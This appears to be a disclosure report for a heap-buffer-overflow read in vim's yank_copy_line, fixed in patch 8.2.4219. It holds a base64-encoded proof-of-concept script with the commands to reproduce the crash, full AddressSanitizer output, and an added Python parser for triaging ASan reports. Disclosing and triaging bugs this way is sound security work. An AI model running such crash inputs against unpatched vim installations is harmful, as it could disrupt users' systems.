Heap-based Buffer Overflow in vim/vim
Valid
Reported on Jan 27th 2022
Description
Heap-buffer-overflow on read in yank_copy_line
This issue was opened to track the yank_copy_line crash separately from the report it was originally filed under; it was fixed with patch 8.2.4219.
Proof of Concept
Steps to reproduce (decode the base64-encoded PoC script, then source it in a headless, restricted vim started without any user configuration):
echo -n c2lsIW5vcm0wbxSA/zAWenk= | base64 -d > heap_ow_poc3
vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc3 -c :qa!
Sanitizer output
==1937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000722f at pc 0x000000c35e3a bp 0x7ffcb4567010 sp 0x7ffcb4567008
READ of size 1 at 0x60200000722f thread T0
#0 0xc35e39 in yank_copy_line /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9
#1 0xc30874 in op_yank /home/presler/fuzzing/vim_sanitized/src/register.c:1217:7
#2 0xa7bffa in do_pending_operator /home/presler/fuzzing/vim_sanitized/src/ops.c:4027:9
#3 0x9fef02 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1146:2
#4 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#5 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#6 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#7 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#8 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#9 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#10 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#11 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#12 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#13 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#14 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#15 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#16 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#17 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#18 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x41db2d in _start (/home/presler/fuzzing/vim_sanitized/src/vim+0x41db2d)
0x60200000722f is located 1 bytes to the left of 2-byte region [0x602000007230,0x602000007232)
allocated by thread T0 here:
#0 0x49626d in malloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x49626d)
#1 0x4c5c67 in lalloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:248:11
#2 0x4c5c3d in alloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:151:12
#3 0x8aaf87 in set_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:682:12
#4 0xa50bca in shift_line /home/presler/fuzzing/vim_sanitized/src/ops.c:269:8
#5 0x8b42e4 in change_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:1302:2
#6 0x643eea in ins_shift /home/presler/fuzzing/vim_sanitized/src/edit.c
#7 0x63ae2f in edit /home/presler/fuzzing/vim_sanitized/src/edit.c:956:6
#8 0xa3f602 in invoke_edit /home/presler/fuzzing/vim_sanitized/src/normal.c:7285:9
#9 0xa40d1f in n_opencmd /home/presler/fuzzing/vim_sanitized/src/normal.c:6544:6
#10 0xa27858 in nv_open /home/presler/fuzzing/vim_sanitized/src/normal.c:7664:2
#11 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
#12 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#13 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#14 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#15 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#16 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#17 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#18 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#19 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#20 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#21 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#22 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#23 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#24 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#25 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#26 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9 in yank_copy_line
Shadow bytes around the buggy address:
0x0c047fff8df0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8e00: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fff8e10: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fff8e20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8e30: fa fa fd fd fa fa fd fa fa fa 01 fa fa fa 00 00
=>0x0c047fff8e40: fa fa 01 fa fa[fa]02 fa fa fa 05 fa fa fa fd fa
0x0c047fff8e50: fa fa 02 fa fa fa 02 fa fa fa 00 fa fa fa 02 fa
0x0c047fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1937==ABORTING
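The sanitizer output above already contains everything a fuzzing triager keys on: the bug class, whether the access was a read or a write and how wide it was, the crashing frame, and where the faulting address sits relative to the nearest heap allocation (here one byte before the start of a two-byte region handed out by set_indent). The following Python parser, added here as an example and not part of this report or of vim, pulls those fields out of such a report so crashes can be bucketed and routed automatically; the sample input is the report's own lines with the long stack traces trimmed, and the set of allocator wrapper names to skip (malloc plus vim's lalloc/alloc) is an assumption taken from the trace.

```python
"""Minimal AddressSanitizer report triage (added example, not vim code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the lines of the sanitizer output above that the parser
# consumes, with the two long stack traces cut down to their first frames.
SAMPLE_REPORT = """\
==1937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000722f at pc 0x000000c35e3a bp 0x7ffcb4567010 sp 0x7ffcb4567008
READ of size 1 at 0x60200000722f thread T0
    #0 0xc35e39 in yank_copy_line /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9
    #1 0xc30874 in op_yank /home/presler/fuzzing/vim_sanitized/src/register.c:1217:7
0x60200000722f is located 1 bytes to the left of 2-byte region [0x602000007230,0x602000007232)
allocated by thread T0 here:
    #0 0x49626d in malloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x49626d)
    #1 0x4c5c67 in lalloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:248:11
    #2 0x4c5c3d in alloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:151:12
    #3 0x8aaf87 in set_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:682:12
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9 in yank_copy_line
"""

ERROR_RE = re.compile(r"AddressSanitizer: ([\w-]+) on address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"^\s*(READ|WRITE) of size (\d+) at (0x[0-9a-fA-F]+)")
REGION_RE = re.compile(r"is located (\d+) bytes? to the (left|right) of (\d+)-byte region")
FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-fA-F]+\s+in\s+(\S+)\s+(\S+)")

# Assumption: allocator entry points and thin wrappers to skip when looking for
# the frame that actually requested the memory (lalloc/alloc are vim's wrappers).
ALLOCATOR_WRAPPERS = {"malloc", "calloc", "realloc", "lalloc", "alloc"}


@dataclass
class Triage:
    bug_class: str
    access: str                 # "READ" or "WRITE"
    size: int                   # bytes accessed
    address: int                # faulting address
    top_frame: str              # function in frame #0 of the access stack
    location: str               # file:line:col of that frame
    offset: Optional[int]       # faulting address minus region start (negative = before it)
    region_size: Optional[int]  # size of the nearest heap region, if reported
    alloc_site: Optional[str]   # first non-allocator frame of the allocation stack

    def dedup_key(self) -> Tuple[str, str, str]:
        """Stable bucket key: same bug class, same access kind, same crashing line."""
        return (self.bug_class, self.access, self.location)

    def kind(self) -> str:
        """Coarse sub-class for routing: underflow vs overflow, read vs write."""
        if self.offset is None:
            return self.bug_class
        side = "underflow" if self.offset < 0 else "overflow"
        return f"heap-{side}-{self.access.lower()}"

    def describe(self) -> str:
        where = "unknown allocation"
        if self.offset is not None and self.region_size is not None:
            if self.offset < 0:
                where = f"{-self.offset} byte(s) before the start of a {self.region_size}-byte region"
            else:
                where = f"{self.offset - self.region_size} byte(s) past the end of a {self.region_size}-byte region"
        alloc = f" allocated in {self.alloc_site}" if self.alloc_site else ""
        return (f"{self.bug_class}: {self.access} of {self.size} byte(s) in "
                f"{self.top_frame} ({self.location}), {where}{alloc}")


def _frames(lines: List[str], start: int) -> List[Tuple[str, str]]:
    """Collect the consecutive '#N addr in func location' frames from index start."""
    frames = []
    for line in lines[start:]:
        m = FRAME_RE.match(line)
        if not m:
            break
        frames.append((m.group(2), m.group(3)))
    return frames


def parse_asan_report(text: str) -> Triage:
    lines = text.splitlines()
    bug_class = access = top_frame = location = alloc_site = None
    size = address = offset = region_size = None
    for i, line in enumerate(lines):
        if bug_class is None and (m := ERROR_RE.search(line)):
            bug_class, address = m.group(1), int(m.group(2), 16)
        elif access is None and (m := ACCESS_RE.match(line)):
            access, size = m.group(1), int(m.group(2))
            frames = _frames(lines, i + 1)
            if not frames:
                raise ValueError("access line is not followed by a stack trace")
            top_frame, location = frames[0]
        elif offset is None and (m := REGION_RE.search(line)):
            dist, side, region_size = int(m.group(1)), m.group(2), int(m.group(3))
            offset = -dist if side == "left" else region_size + dist
        elif line.startswith("allocated by"):
            for func, _ in _frames(lines, i + 1):
                if func not in ALLOCATOR_WRAPPERS:
                    alloc_site = func
                    break
    if bug_class is None or access is None:
        raise ValueError("not a recognised AddressSanitizer report")
    return Triage(bug_class, access, size, address, top_frame, location,
                  offset, region_size, alloc_site)


if __name__ == "__main__":
    t = parse_asan_report(SAMPLE_REPORT)
    print(t.kind())
    print(t.describe())
```

The negative offset is the detail worth surfacing: a read one byte before the start of a fresh allocation points at an index going below zero (an empty or very short line being stepped back over) rather than at a missing length check at the end of the buffer, which is a different fix and a different regression test. The dedup key deliberately uses the crashing file:line rather than the address, since ASan addresses change from run to run.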
Occurrences
register.c#L1477
As mentioned in the description, this was in another bug report and is now separate, thus still a valid issue. It was fixed in patch 8.2.4219, which includes a test based on the PoC.